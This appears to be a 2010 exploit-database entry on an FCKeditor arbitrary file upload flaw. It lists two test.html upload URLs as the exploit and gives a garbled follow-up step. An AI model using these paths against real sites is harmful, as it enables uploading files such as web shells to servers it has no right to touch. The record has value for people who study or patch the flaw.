FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)



EKU-ID: 19463 CVE: OSVDB-ID:
Author: Mr.MLL Published: 2010-04-16 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


# Title: CMS (fckeditor) Remote Arbitrary File Upload Exploit


# Author: Mr.MLL
# Published: 2010-04-15
# Verified: yes
# Download Exploit Code
# Download N/A

==================================================================================================================


[o] CMS (fckeditor)

Software : fckeditor ( version all )
Vendor : http://ckeditor.com/
Contact : 7@live.com & Y-3@hotmail.com & te1@yahoo.com
Home : http://sec-r1z.com/


==================================================================================================================


[o] Exploit

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

http://localhost/[path]/FCKeditor/editor/filemanager/browser/default/test.html





[o] After the piece go to the path that will set you back after graduation


==================================================================================================================


[o] Greetz



muslims hacker & All My Friends


==================================================================================================================